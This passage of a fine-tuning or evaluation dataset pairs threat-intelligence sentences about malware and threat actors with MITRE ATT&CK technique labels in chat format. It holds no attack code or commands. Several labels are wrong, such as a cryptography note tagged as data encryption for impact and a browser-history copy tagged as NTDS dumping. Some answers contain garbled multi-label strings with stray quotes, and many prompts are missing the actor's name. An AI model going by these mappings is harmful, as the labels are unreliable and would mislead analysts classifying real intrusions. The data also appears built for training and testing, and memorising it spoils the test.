- },
- {
- "role": "user",
- "content": "Like many threat groups, TG-3390 conducts strategic web compromises (SWCs), also known as watering hole attacks, on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The spreadsheet also creates a scheduled task named \"windows update check\" that runs the file C:\\Users\\\\.templates\\System Manager.exe every minute."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some FinFisher variants incorporate an MBR rootkit."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can execute JavaScript containing configuration data for establishing persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk retrieves the hard disk name by calling the \"CreateFileA to \\\\.\\PHYSICALDRIVE0\" API."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can execute malicious JavaScript payloads on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "According to the public source data, these airlines use services of the same IT service provider. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China's interests as well as committing financially motivated cybercrimes. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. Source: Group-IB Threat Intelligence & Attribution Another interesting domain is service[.]dns22[.]ml. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can delete files from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Path – location of the root “stash” directory - Ext – search for files with one of these extensions only - Date – search for files not earlier than this date"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy can capture screenshots of the desktop over multiple monitors."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used malicious macros embedded inside Office documents to execute files."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "logs the keystrokes on the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz can use MSI files with embedded VBScript for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT enumerated the Orion software Visual Studio solution directory path."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: Script code embedded in 29[.]html used to download and run Revenge RAT The script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3), the only difference being the absence of a sleep command and the usage of the “forfiles” utility"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL can run Systeminfo to gather information about the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 can exfiltrate data over Google Drive."
- },
- {
- "role": "assistant",
- "content": "T1567 - Exfiltration Over Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a module to execute Mimikatz with PowerShell to perform ."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linfo creates a backdoor through which remote attackers can list contents of drives and search for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used VBS and VBE scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SodaMaster has the ability to download additional payloads from C2 to the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie attempts to detect several anti-virus products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP and HTTPS to communicate with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of listing files, folders, and drives on a victim."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Wocao, the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and BloodHound."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution. An interesting element is that the malware looks for filenames created with the previous version of KONNI. This implies that the malware targeted the same people as the previous version and they are designed to work together"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used WMI queries to check if various security applications were running, as well as the operating system version."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE can gather the username from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains junk code in its functions in an effort to confuse disassembly programs."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to obtain legitimate credentials during operations."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit modules are written in and executed via PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess can download additional payloads to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HIDEDRV injects a DLL for Downdelph into the explorer.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for certain Registry keys to be configured before executing the payload."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter listed all running processes on the machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can create `HKCU\\Software\\Classes\\Folder\\shell\\open\\command` as a new registry key during privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One version of uses a PowerShell script."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has uploaded files and information from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to download, unpack, and decrypt tar.gz files ."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot can run a batch script named `del.bat` to remove any Saint Bot payload-linked files from a compromise system if anti-analysis or locale checks fail."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note: the NTRUEncrypt public key cryptosystem encryption algorithm (NTRU), is a lattice-based alternative to Rivest-Shamir-Adleman, known as RSA, and Elliptic-curve cryptography, or ECC, and is based on the shortest vector problem in a lattice"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian has the ability to take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April. The worm specifically scans for the existence of the DoublePulsar backdoor on compromised systems. If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock. The second thread scans randomly chosen external IP addresses"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Check status, control, and end processes and services. Create, modify, and delete registry subkeys. Retrieve a list of logical drives"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its purpose is to load Msadoz.dll in order to decrypt and execute it in memory"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations. To combat this, the threat actor periodically “refreshed” their credential set by performing credential theft activities in an already compromised environment. At one victim, CrowdStrike identified multiple instances of domain credential theft months apart, each time with a different credential theft technique"
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use Mshta.exe to execute additional payloads on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used PowerShell scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If I open up the WebCacheV01.dat file in ESEDatabaseView or BrowsingHistoryView, I see browsing history leading up to my testing. Initially, I thought it was grabbing a copy of the file from a previous Volume Shadow Copy (VSC) but that isn’t the case. Esentutl.exe is able to use the Volume Shadow Copy service to make a backup of a locked file"
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bonadan can XOR-encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These parameters install it as a service"
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The FTP account information used in the malware can expose the C&C server to attacks. The string ‘victory’ used in the password has also been found in the b374k webshell used by the Kimsuky group"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used credential dumping tools such as and Lazagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identify configuration settings, exfiltrate data, and to execute other commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can monitor services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes using regsvr32.exe called from the persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services', 'T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can capture screenshots of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
